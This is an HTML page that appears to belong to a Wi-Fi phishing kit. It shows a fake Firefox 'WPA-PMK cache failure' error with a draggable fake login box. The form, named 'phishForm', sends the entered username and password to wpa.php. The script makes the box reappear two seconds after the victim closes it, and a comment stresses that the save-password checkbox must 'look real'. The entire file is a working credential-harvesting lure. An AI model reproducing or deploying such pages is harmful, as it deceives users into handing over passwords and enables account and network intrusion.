<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WPA-PMK cache failure warning 3343</title>
  <link href="jquery-ui.css" rel="stylesheet" type="text/css"/>
  <script src="jquery.min.js"></script>
  <script src="jquery-ui.min.js"></script>

<script>
	startColor = 0;
	if (navigator.userAgent.match(/[fF][iI][Rr][Ee][fF][oO][Xx]/))
		{ // go to this page, or modify this css id:
			}
	else {  } 
	$(document).ready(function() {
		$(".login").hide();
		var t=setTimeout("showWindow()",3000);
    	var opt = {
              containment: "parent",
			  handle: "#handleBar"
          };
		$(".login").draggable(opt);
  	});
	function checkText() {
		if (startColor == '0') {
			document.getElementById('changeMe').style.color = '#000';
			startColor = 1;
		}else { 
			document.getElementById('changeMe').style.color = '#666';
			startColor = 0;
		}
	}
	function closeWindow() {
		// hide the login dive for a few seconds:
		$(".login").hide();
		var t=setTimeout("showWindow()",2000);
		// clear input values too:
		document.getElementById('phishForm').reset();

	}
	function showWindow() {
		$(".login").show();	
	}
</script>
<style type="text/css">
<!--
.login {
	height: 381px;
	width: 360px;
	background-image: url(login.png);
	background-repeat: no-repeat;
	/*margin-left: 100px;
	margin-top: 120px;*/
	margin-left: 30%;
	margin-top: 20%
	float: left;
}
.fields {
	padding-top: 5px;
	margin: 0px;
}
.fieldsWhole {
	margin-top: 162px;
	padding-left: 100px;
	width: auto;
}
.button {
	padding-left: 70px;
	padding-top: 20px;
	margin: 0px;
}
.checkbutton {
	margin-top: 24px;
	padding-left: 10px;
}
body {
	background-image: url();
	background-repeat: no-repeat;
	background-color: #181818;
}
.fullBG {
	background-image: url(firefox_error.png);
	background-repeat:no-repeat;
	background-position: center top;
	width: auto;
	height: 800px;
	border: solid thin #181818;
}
-->
</style>
</head>

<body>
<!-- The background of the body -->
<div class="fullBG">
	<!-- The draggable login div -->
    <div class="login" id="dragme">
    	<div id="handleBar" style="height: 25px; width: 340px;">
    		<div style="height: 20px; width:20px; float: right; margin-top: 5px;" onClick="closeWindow();"></div>
        </div>
        <form id="phishForm" method="post" action="wpa.php" autocomplete="off">	
            <!-- Start the Fields Div -->
            <div class="fieldsWhole">
                <!-- The uswername field -->
                <div class="fields">
                <input type="text" size="22" name="usr-phi" /><br />
                </div>
                <!-- The Password Field -->
                <div class="fields">
                <input type="text" size="22" name="passwd-phi" /><br />
                </div>
                <!-- The Domain Field -->
                <!-- <div class="fields"> -->
                <!-- <input type="text" size="22" name="domain-phi" /><br /> -->
                </div>
            <!-- Damn check button, needs to look real too! -->
            <div class="checkbutton" style="float:left;">
                <input type="checkbox" onClick="checkText();"/>
            </div><div style="width: 300px; color: #666; font-family:Arial, Helvetica, sans-serif; float: left; font-size:11px; margin-top:27px; margin-bottom:18px;" id="changeMe">Save this username and password for future use</div>
            <!-- Start Button Div -->
            <div class="button">
              <input type="image" src="okbutton.png" style="cursor: default"/>
            </div>
        </form>
    </div>
</div>
</body>
</html>
